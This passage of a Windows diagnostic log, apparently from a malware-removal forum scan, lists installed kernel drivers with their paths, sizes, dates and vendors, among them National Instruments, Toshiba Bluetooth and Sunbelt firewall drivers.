R2 nipxirmk; C:\WINDOWS\system32\drivers\nipxirmkl.sys [11344 2010-02-18] (National Instruments Corporation)
S3 niraptrk; C:\WINDOWS\system32\drivers\niraptrkl.sys [11336 2010-02-11] (National Instruments Corporation)
S3 niscdk; C:\WINDOWS\system32\drivers\niscdkl.sys [11376 2009-07-14] (National Instruments Corporation)
S3 nisdigk; C:\WINDOWS\system32\drivers\nisdigkl.sys [11352 2010-02-19] (National Instruments Corporation)
S3 nisftk; C:\WINDOWS\system32\drivers\nisftkl.sys [11344 2010-02-05] (National Instruments Corporation)
S3 nispdk; C:\WINDOWS\system32\drivers\nispdkl.sys [11376 2009-07-14] (National Instruments Corporation)
S3 nissrk; C:\WINDOWS\system32\drivers\nissrkl.sys [11336 2010-02-06] (National Instruments Corporation)
S3 nistc2k; C:\WINDOWS\system32\drivers\nistc2kl.sys [11312 2009-01-05] (National Instruments Corporation)
S3 nistc3rk; C:\WINDOWS\system32\drivers\nistc3rkl.sys [11328 2010-02-06] (National Instruments Corporation)
S3 nistcrk; C:\WINDOWS\system32\drivers\nistcrkl.sys [11360 2009-08-31] (National Instruments Corporation)
S3 niswdk; C:\WINDOWS\system32\drivers\niswdkl.sys [11336 2009-09-01] (National Instruments Corporation)
S3 nitiork; C:\WINDOWS\system32\drivers\nitiorkl.sys [11360 2010-02-06] (National Instruments Corporation)
S3 niufurk; C:\WINDOWS\system32\drivers\niufurkl.sys [11368 2010-02-11] (National Instruments Corporation)
S3 NiViFWK; C:\WINDOWS\System32\drivers\NiViFWKl.sys [11384 2009-03-05] (National Instruments Corporation)
S3 NiViPciK; C:\WINDOWS\System32\drivers\NiViPciKl.sys [11360 2009-06-21] (National Instruments Corporation)
R2 NiViPxiK; C:\WINDOWS\System32\drivers\NiViPxiKl.sys [11360 2009-06-21] (National Instruments Corporation)
S3 niwfrk; C:\WINDOWS\system32\drivers\niwfrkl.sys [11336 2010-02-06] (National Instruments Corporation)
S3 nixsrk; C:\WINDOWS\system32\drivers\nixsrkl.sys [11336 2010-02-11] (National Instruments Corporation)
R1 omci; C:\WINDOWS\System32\DRIVERS\omci.sys [17153 2004-02-13] (Dell Inc) [File not signed]
R1 PQIMount; C:\WINDOWS\system32\Drivers\PQIMount.sys [46773 2004-02-17] (PowerQuest Corporation) [File not signed]
R0 PQV2i; C:\WINDOWS\system32\Drivers\PQV2i.sys [138118 2004-02-17] (StorageCraft) [File not signed]
R0 PxHelp20; C:\WINDOWS\System32\Drivers\PxHelp20.sys [20576 2005-01-26] (Sonic Solutions) [File not signed]
R1 SbFw; C:\WINDOWS\System32\drivers\SbFw.sys [332248 2011-04-05] (Sunbelt Software, Inc.)
S3 SBFWIMCL; C:\WINDOWS\System32\DRIVERS\sbfwim.sys [69208 2011-02-08] (Sunbelt Software, Inc.)
R3 SBFWIMCLMP; C:\WINDOWS\System32\DRIVERS\SBFWIM.sys [69208 2011-02-08] (Sunbelt Software, Inc.)
S3 sbhips; C:\WINDOWS\System32\drivers\sbhips.sys [94040 2011-04-05] (Sunbelt Software, Inc.)
R1 SbTis; C:\WINDOWS\System32\drivers\sbtis.sys [212568 2011-04-05] (Sunbelt Software, Inc.)
S3 silabenm; C:\WINDOWS\System32\DRIVERS\silabenm.sys [17920 2008-08-27] (Silicon Laboratories, Inc.)
S3 silabser; C:\WINDOWS\System32\DRIVERS\silabser.sys [60544 2008-08-27] (Silicon Laboratories)
R3 STHDA; C:\WINDOWS\System32\drivers\sthda.sys [1156648 2006-03-24] (SigmaTel, Inc.)
R1 Tcpip6; C:\WINDOWS\System32\DRIVERS\tcpip6.sys [226880 2010-02-11] (Microsoft Corporation)
S3 toshidpt; C:\WINDOWS\System32\drivers\Toshidpt.sys [3712 2005-07-11] (TOSHIBA Corporation.) [File not signed]
R3 tosporte; C:\WINDOWS\System32\DRIVERS\tosporte.sys [47104 2005-11-22] (TOSHIBA Corporation) [File not signed]
S3 Tosrfbd; C:\WINDOWS\System32\Drivers\tosrfbd.sys [108928 2006-01-20] (TOSHIBA CORPORATION) [File not signed]
S3 Tosrfbnp; C:\WINDOWS\System32\Drivers\tosrfbnp.sys [36480 2005-09-15] (TOSHIBA Corporation) [File not signed]
R1 Tosrfcom; C:\WINDOWS\System32\Drivers\tosrfcom.sys [64896 2005-08-01] (TOSHIBA Corporation) [File not signed]
S3 Tosrfhid; C:\WINDOWS\System32\DRIVERS\Tosrfhid.sys [62848 2006-01-11] (TOSHIBA Corporation.) [File not signed]
S3 tosrfnds; C:\WINDOWS\System32\DRIVERS\tosrfnds.sys [18612 2005-01-06] (TOSHIBA Corporation.) [File not signed]
S3 TosRfSnd; C:\WINDOWS\System32\drivers\TosRfSnd.sys [50048 2005-04-06] (TOSHIBA Corporation) [File not signed]
S3 Tosrfusb; C:\WINDOWS\System32\Drivers\tosrfusb.sys [39936 2006-02-09] (TOSHIBA CORPORATION) [File not signed]
R3 wanatw; C:\WINDOWS\System32\DRIVERS\wanatw4.sys [33588 2003-01-10] (America Online, Inc.)
S3 FilterService; system32\DRIVERS\lvuvcflt.sys [X]
S3 LVUVC; system32\DRIVERS\lvuvc.sys [X]
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-14] (Microsoft Corporation)
S3 usb6xxxk; \??\C:\WINDOWS\system32\drivers\usb6xxxkl.sys [X]